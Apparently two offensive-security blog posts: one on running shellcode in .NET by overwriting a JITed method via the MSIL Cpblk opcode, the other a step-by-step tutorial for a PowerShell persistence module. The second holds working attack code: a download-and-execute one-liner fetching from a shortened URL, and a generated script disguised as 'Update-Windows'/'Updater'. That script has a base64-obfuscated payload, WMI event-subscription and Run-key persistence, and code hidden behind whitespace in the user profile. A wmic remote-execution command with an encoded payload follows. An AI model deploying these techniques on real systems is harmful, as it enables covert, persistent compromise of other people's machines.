Shellcode Execution in .NET using MSIL-based JIT Overwrite

Download: Invoke-ShellcodeMSIL

While investigating MSIL opcodes a while back, I uncovered a useful opcode - Cpblk. Cpblk is the MSIL equivalent of a memcpy. After writing a .NET method that utilized Cpblk, I immediately thought of a practical use - overwrite a JITed .NET method with shellcode. That way, I could execute shellcode directly without needing to call any Win32 functions. I wrote Invoke-ShellcodeMSIL as an implementation of my idea.

For those who are unfamiliar with MSIL. MSIL is Microsoft's implementation of the Common Interface Language or in other words, .NET bytecode. Using reflection or an IL assembler (like ilasm), you can craft .NET methods using raw MSIL opcodes. There is a great introduction to MSIL opcode assembly in "Metaprogramming in .NET."

For Invoke-ShellcodeMSIL, I wrote a dummy method that simply XORs an input number 101 times. I chose to use an XOR function because I was confident that it would not be optimized during the JIT process. As a consequence, this dummy method will contain sufficient space for a shellcode buffer.

I then wrote the 'memcpy' method using the following opcodes:

Ldarg_0 - Arg0 is the destination buffer (i.e. the address of the dummy JITed method)
Ldarg_1 - Arg1 is the source buffer (i.e. where my shellcode is allocated in RW memory)
Ldarg_2 - Arg2 is the length of the source buffer
Volatile
Cpblk
Ret

After defining the XOR method using reflection, I executed it twenty times in order to force the method to be JITed. Finally, I called my overwrite method and overwrote the JITed XOR method with my shellcode. Here are the screenshots of the disassembly before (left) and after (right) the overwrite:

When you provide your shellcode to Invoke-ShellcodeMSIL, make sure your shellcode ends in a RET and that the stack is in proper alignment (duh :P) or PowerShell will crash. A shellcode stub us generated at runtime depending upon the bitness PowerShell. All it does is save the non-volatile registers, jump to your shellcode, and return zero to the caller. The rest is up to you. :D

Enjoy!

Practical Persistence with PowerShell

Download: Persistence Module

As I've preached continuously, PowerShell is the ideal post-exploitation tool in a Windows environment. A PowerShell-based payload can accomplish the same tasks of any compiled payload all without fear of flagging anti-virus. Unfortunately, PowerShell offers no built in method of persisting your payloads. PowerShell v3 introduced a scheduled tasks module but obviously, this only works with v3 and you're out of luck if you want to persist via any other method.

I developed a persistence module for PowerShell that solves the challenges of persisting scripts once and for all. The module adds persistence capabilities to any PowerShell script. Upon persisting, the script will strip out its persistence logic.

Generating a persistent script is relatively straightforward:

1) Drop the 'Persistence' folder into your module directory (usually $Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules) or just install the entire PowerSploit module.

2) Import the 'Persistence' module

Import-Module Persistence

3) Create your payload. This can come in the form of a scriptblock or a ps1 file. In this example, I'll be using a scriptblock consisting of a rickroll payload. ;D

$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }

4) Specify the desired limited-user persistence options:

$UserOptions = New-UserPersistenceOptions -Registry -AtLogon

5) Specify the desired elevated persistence options:

$ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM'

6) Apply the persistence options to the rockroll payload. A persistence and removal script will be generated:

Add-Persistence -ScriptBlock $Rickroll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -PassThru -Verbose

6a) Optionally, create a one-liner out of the generated persistence script (requires the full PowerSploit module):

Add-Persistence -ScriptBlock $Rickroll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -PassThru -Verbose |
Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1

7) The generated script will look like this:

function Update-Windows{
Param([Switch]$Persist)
$ErrorActionPreference='SilentlyContinue'
$Script={sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('U8hMrVDQyCwvUsgoKSmw0tdPyizRy6nUTzXwLbcsV9BUAAA='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()}
if($Persist){
if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
{$Payload="`$Filter=Set-WmiInstance -Class __EventFilter -Namespace `"root\subscription`" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=`"WQL`";Query=`"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 15 AND TargetInstance.Minute = 00 GROUP WITHIN 60`"};`$Consumer=Set-WmiInstance -Namespace `"root\subscription`" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=`"`$(`$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`";RunInteractively='false'};Set-WmiInstance -Namespace `"root\subscription`" -Class __FilterToConsumerBinding -Arguments @{Filter=`$Filter;Consumer=`$Consumer} | Out-Null"}
else
{$Payload='New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value "`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe`" -NonInteractive -WindowStyle Hidden"'}
' '*600+$Script.ToString()|Out-File $PROFILE.CurrentUserAllHosts -Append -NoClobber -Force
iex $Payload|Out-Null
Write-Output $Payload}
else
{$Script.Invoke()}
} Update-Windows -Persist

8) Deploy the payload. In my example, I will execute the persistent payload remotely using WMIC and the encoded one-liner I generated:

wmic /USER:"CorpNet\JoeUser" /PASSWORD:"password123" /NODE:10.10.0.19 process call create "powershell -EncodedCommand 'cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAcABWAFYAdABiACsASgBHAEUAUAA2AE8AeABIADkAWQBJAFMAVABEAHQAYgBhADQAWABCAHUAMQBRAFUAaAAxAEMAQgB6AFcAOABSAFoAcwBvAEYASwBJAFkATABFAEgAcwB1ADEANgAxADkAcABkAFEAMwB3AGsALwA3ADEAagBEAEwAawBrAE8AbAAyAGwAOQBwAHQAbgBaADMAYQBlAG0AVwBkAG0ASAA1AGQATABtADEAUwBFAGgAawBsAEIAcABrAGwARQBEAGQAaAB6AEoAaQBLADUAMQA0AGQAeQBhAFUAdwBWAGoAVwB0ADMALwBwADYAWgA4AE8ARwArAE8AZwBhAGwAbQBUAGIAMQBjAHEAbgBhAFUAVQBvAHEAOQAzAGgAdAByAEcAQQBEAEMAawBRAEkATABjAHQAbgBIAEkAVABoAFcAVgBzAEsAdwAwAFEASwBGAG8AYgA2AG8AVwBLAEoAYQBSADAAMAA1AFkAUwBTAEkAZQB6AHQAMABmAG8AdgBDAEUAMgBUAHcAVwBPAE4ARQBtAC8AawArAEUAWQBCAGoAUwBkAEEASQAxAEMAMQA0AHEAZwB0ADQAMABTAEIAMQBwAGoAZgB1AFkARQBOAHgANwBxAEsAcQBOAG8AZABlAGcAYwBRAFMANQBVAFYAQgAvAGQAMwBDAEwAWQBEAFoAZQA2AHYAcgByAHAASwB4AHQAZABVAHcAKwBVAHYANgBHAE4AaQBXADcATwBtAHYAegAwAE0AMQBPAHoAbQBOAG0AdgB2AGQAMQBPADkAbABWAC8AOABlAE4AOAB3ADAAVABoAGoAWAB5AGYAWgBwAFoAZwBHAFgALwAvAGMAOQA5AGUAaABuAHYAMQArAFAAWABWAGQAdAAyAFgAVgBmADcANQA3AEIALwAvAHEAZQB5AEEAagBRAEoAZwBiAEMARQA5AG4AZABRAHcAUAA0AE4ARQA0AEgAUgBIAEsAQwBCAEgAUgA2AC8AcAB0AHoANgB2AFgAbgBiAHkAZgBRAEgAWgBFAFYASwBzAC8AbAAwAHQAcwBVADMAdgBoADcAMwBBADAAawBWAGMASQBVADgAVgBNADUAbwB5AHgAMgBKAEEAbABsAEQAcwBuADcAbAA4AE8ANwBuADgAUQA1AEUAWABJAE4AWABvAFEAOAB6AE8AWQBkAHEAcAB3AEMASwBhAEcAeQBKADcAMgB4AEUAUgB5ACsAQgBIAEMAZABjAHEANABLAGMATAB1AEwAVABlAEsAbQBjAEQASwBGAEQAVgBTAFcAWABVAGMAOABLAEUANgBwAGgAbQBYAE4ARwBwAFYAVgB0AFUAdQBoAG8ASgBxACsAVwBEAHMAZQBjAHcAOABvAFEAMwBGAGEAUgBPADcAegBhAG4AVwBaAEwAbgBzADcAQgBDADQAQwBDAEwAMgBrAE0AYQBnAEUANAByACsAVgBVAFYASgBhAFIAWQA2AFgAZQB2AGoAQwBpAEMAQgBxAHcAcQB4AFgAYgBWAE4AWQA3AHkAZwB5AFIAOABIAGcAYwBFAHQAcQA5AGcANwBaAFQAVwBQAGkAZgBJAEUAZgBwADYAZwBaAFIAMwB2AHQAMQBrADgAdQA3AEMAYQB0AHkAbQBvAHIARQAvAEYATgBxAFYAYgBhAEsAMABxADgAOQB2ACsAcQBsAEsAYwBvAHUAVgAzACsAcAAxADIAUQBEADYAUQA3AG0AUQAwAHcASgBMAE8AUgBlAEwARQAyAEkAYQBGAE4AQQBjAC8AWgBpAGQAegBMACsAaAA1AFEAMwBMAFoASQBQAE4AZQBaADkASQBoAEEAVgBWAGIATQBDADkATgBlAGIANQBMAEwATwBUAG8AMAA4AFcAeQBMADAAUABLAEEAeABhAEQAUgBkAHoAaAB6AGIAdABBAHAAeQBkAFQAUgBWAHIAawA0ADYALwBmAGMAdwA1AHcAKwBRADIAZwB1ADkARQBnAG4AeQBlAGoANgBmAGcAYgA3AEsAcgB5ADMARgB4AFYAYwBXAGMAMQBzAHYAQQBkAFUAdgArAFYAdgA0AEoAMQBDADkAYwB5AHAAaQBMAHEATQB3AEgASAB4AHMANABaAHIAYgBjAE0AawAzAGMAVQB2ADcAbwBXAFEASgB6AGsARAB3AHYAcABXADEAVgByAHEAMgBwAEgANwBLADcAOABUAEIAdQBJAEoANABoAGIAWAB4AFQAZgBuAHkANABXADUANgBXAFUAZQAxAEQAKwBBADMAQwArADIASAAxADAARwBvAHMAawB0ADMAVgB1AE8ALwBDAFkAVgB5ADYARgBKAHgAQwBFAG8AaQB6AHMAQQBJAGMAegBTAFYAOABmADgASwB4AGwAYgBTAGoAWABZAEQAMAAzAC8AMgB2AFgAeQAyAFcAeABaAG8ARQA4AHQAMwB1AE4AdABlAEcANwBlADkAdgAwAGEAVwBIAFAAbQA5AHQAOABZAGYAcwBiADgAYwAvAGsAaQBZAHgAUwBZAHcAOQBUAHoAaQB2ADQAUABnAEUATABlADcAMwAyAFYAaQA1AFUASAB2AFkALwBWAGoASgBCAGQAYwBtAEkAUABhAGIAbQBnAGYAUwArAHQASwBkAFgAdgB0AHkAWQBQAFYAVwB3AEcATABCAFEAUwBZADMAVwBtAGEAUABGADYAUgBuAE8AOABxAGMAdQB4AFEASQBwAFcAQgBUAGQAbgBkAFEAVgBYADgAZwA1AFkANQBBAGwAUQBBAHEAaABJAHYAYQBNADgAaABSAEkAWgBWAFcAcAAxAHYANwBuAEkASABLADIAMwBvADYAQwBuAEMAVABkAE4AeABrAEgAMABtAE0AUgBDAGsAZgBGAHcAcQBZAHQAWQBuADIANABiAEQAUgArAE8AbQBtADAARQA4AGkAVABiAHQAYQBmAGMAbQA2AFEAUABTAEQAVgA4AFcAVABVADkAZgBvAGQANQA5AFQAWgBWAEkATgB5AE8AZQA5AEoAagBWAFQAYgBiAHAASwBBAGkASABMAEEATgBwAGYAcgBkAGQANQBlAFYANgBvAFEAcQBVAFIAMQBKADIAYwAyAG4AOAA1AE0AbAAwAHQAegBsAEMATwB3ADAAVQA1AFMAOAArAEoALwB4AGYAKwBwAEUAawAvAHMANQBOADkAdwBWAE0ANwBuAGQALwA4AGwASgBMAEQAUQAwAFgASwBwAFgAUABvAEgAJwApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApAA=='"

9) The payload has now persisted on the target machine. Sit back and let the hilarity ensue.